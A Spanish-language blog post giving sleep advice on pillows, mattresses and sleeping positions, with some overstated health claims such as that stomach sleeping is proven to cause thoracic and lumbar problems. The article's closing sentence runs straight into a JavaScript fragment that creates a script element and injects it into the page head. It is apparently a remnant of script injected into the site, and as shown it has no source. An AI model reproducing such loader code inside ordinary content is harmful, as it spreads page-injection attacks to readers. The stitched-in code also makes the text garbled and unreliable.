Salud y belleza » Bienestar, Salud

Técnicas para alcanzar un sueño profundo

Sin Comentarios

Hoy no hablaremos de recetas caseras, de remedios naturales o de dietas para contribuir al buen sueño. No, señor. En este caso el tema que nos compete es otro que aún no hemos abordado y que es sumamente importante: estrategias para el buen dormir. De eso sí hablaremos.

sueño profundo

Básicamente, entre los factores técnicos que debemos tener en cuenta a la hora de dormir sobresalen tres aspectos fundamentales: la almohada, el colchón y la posición.

Con respecto a la almohada, sin dudas estamos hablando del “mejor amigo” del sueño.
Una buena almohada como apoyo de la cabeza es primordial para poder dormir de forma placentera. A la hora de escogerla, entonces, debemos tener en cuenta el material con el cual está hecha; generalmente los hombres prefieren almohadas duras mientras que las mujeres gustan de utilizar otras más blandas, de plumas. Para aquellos que duermen boca arriba, es recomendable llevarse a la cama otra almohada de repuesto más baja para así llenar el espacio entre el cuello y la parte posterior de la cabeza (sin comprimir o comprometer nuestra columna vertebral).

Sobre la elección del colchón: se recomienda utilizar uno sin presión Es ideal para conciliar el sueño no poseer un colchón muy blando ni muy firme pero, en materia de extremos, es preferible uno blando pues el firme puede dañar nuestra postura y hasta darnos espasmos de espalda. En cuanto al material, es preferible el látex pues tiene como beneficio una mejor adaptación a nuestro contorno. Por otra parte, los colchones de agua no son de fiar pues presentan mucho movimiento y, a su vez, pueden ser un tanto inestables.

Finalmente llegamos a un tema crucial: la posición. De entre las múltiples opciones de las que disponemos para dormir, existen algunas más sanas que otras. Veamos: dormir boca abajo puede ser perjudicial. Está comprobado que quienes duermen de ese modo sufren, en el largo plazo, padecimientos en las regiones toráxica y lumbar.

Otras recomendaciones: cuando dormirmos “de lado” debemos mantener la columna alineada y los brazos debajo del mentón; las rodillas deben estar flexionadas y con una almohadita fina entre ellas para impedir su rotación. Con esto logramos que la región lumbar no se mantenga extendida (puede causar una hernia de disco).

Si en cambio escogemos dormir boca arriba, lo debemos hacer utilizando una almohada o un rollo de espuma debajo de las rodillas, así éstas permanecen semiflexionadas durante la noche, dejando las caderas bien posicionadas y los músculos lumbares relajados (si dormimos boca arriba con las piernas estiradas podemos dañar nuestra zona lumbar y si, peor aún, doblamos la almohada para que quede más alta estamos forzando la zona cervical de un modo peligroso).

Utilizando estos trucos, seguro, podremos mejorar nuestro sueño. Seguro..zzzzzz…var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.